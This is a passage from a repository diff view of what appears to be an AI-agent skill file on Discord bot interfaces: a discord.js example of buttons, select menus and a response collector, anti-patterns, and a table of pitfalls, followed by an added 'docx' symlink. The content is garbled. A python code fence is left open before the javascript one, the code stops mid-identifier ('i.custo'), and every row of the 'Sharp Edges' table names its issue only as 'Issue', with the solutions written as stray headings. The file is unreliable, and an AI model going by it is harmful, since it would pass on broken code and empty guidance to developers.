Using buttons, select menus, and modals for rich UX
|
||||
|
||||
**When to use**: ['Need interactive user interfaces', 'Collecting user input beyond slash command options', 'Building menus, confirmations, or forms']
|
||||
|
||||
```python
|
||||
```javascript
|
||||
// Discord.js - Buttons and Select Menus
|
||||
const {
|
||||
SlashCommandBuilder,
|
||||
ActionRowBuilder,
|
||||
ButtonBuilder,
|
||||
ButtonStyle,
|
||||
StringSelectMenuBuilder,
|
||||
ModalBuilder,
|
||||
TextInputBuilder,
|
||||
TextInputStyle
|
||||
} = require('discord.js');
|
||||
|
||||
module.exports = {
|
||||
data: new SlashCommandBuilder()
|
||||
.setName('menu')
|
||||
.setDescription('Shows an interactive menu'),
|
||||
|
||||
async execute(interaction) {
|
||||
// Button row
|
||||
const buttonRow = new ActionRowBuilder()
|
||||
.addComponents(
|
||||
new ButtonBuilder()
|
||||
.setCustomId('confirm')
|
||||
.setLabel('Confirm')
|
||||
.setStyle(ButtonStyle.Primary),
|
||||
new ButtonBuilder()
|
||||
.setCustomId('cancel')
|
||||
.setLabel('Cancel')
|
||||
.setStyle(ButtonStyle.Danger),
|
||||
new ButtonBuilder()
|
||||
.setLabel('Documentation')
|
||||
.setURL('https://discord.js.org')
|
||||
.setStyle(ButtonStyle.Link) // Link buttons don't emit events
|
||||
);
|
||||
|
||||
// Select menu row (one per row, takes all 5 slots)
|
||||
const selectRow = new ActionRowBuilder()
|
||||
.addComponents(
|
||||
new StringSelectMenuBuilder()
|
||||
.setCustomId('select-role')
|
||||
.setPlaceholder('Select a role')
|
||||
.setMinValues(1)
|
||||
.setMaxValues(3)
|
||||
.addOptions([
|
||||
{ label: 'Developer', value: 'dev', emoji: '💻' },
|
||||
{ label: 'Designer', value: 'design', emoji: '🎨' },
|
||||
{ label: 'Community', value: 'community', emoji: '🎉' }
|
||||
])
|
||||
);
|
||||
|
||||
await interaction.reply({
|
||||
content: 'Choose an option:',
|
||||
components: [buttonRow, selectRow]
|
||||
});
|
||||
|
||||
// Collect responses
|
||||
const collector = interaction.channel.createMessageComponentCollector({
|
||||
filter: i => i.user.id === interaction.user.id,
|
||||
time: 60_000 // 60 seconds timeout
|
||||
});
|
||||
|
||||
collector.on('collect', async i => {
|
||||
if (i.customId === 'confirm') {
|
||||
await i.update({ content: 'Confirmed!', components: [] });
|
||||
collector.stop();
|
||||
} else if (i.custo
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Message Content for Commands
|
||||
|
||||
**Why bad**: Message Content Intent is privileged and deprecated for bot commands.
|
||||
Slash commands are the intended approach.
|
||||
|
||||
### ❌ Syncing Commands on Every Start
|
||||
|
||||
**Why bad**: Command registration is rate limited. Global commands take up to 1 hour
|
||||
to propagate. Syncing on every start wastes API calls and can hit limits.
|
||||
|
||||
### ❌ Blocking the Event Loop
|
||||
|
||||
**Why bad**: Discord gateway requires regular heartbeats. Blocking operations
|
||||
cause missed heartbeats and disconnections.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | ## Acknowledge immediately, process later |
|
||||
| Issue | critical | ## Step 1: Enable in Developer Portal |
|
||||
| Issue | high | ## Use a separate deploy script (not on startup) |
|
||||
| Issue | critical | ## Never hardcode tokens |
|
||||
| Issue | high | ## Generate correct invite URL |
|
||||
| Issue | medium | ## Development: Use guild commands |
|
||||
| Issue | medium | ## Never block the event loop |
|
||||
| Issue | medium | ## Show modal immediately |
|
||||
1
skills/docx
Symbolic link
1
skills/docx
Symbolic link
@@ -0,0 +1 @@
|
||||
docx-official
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user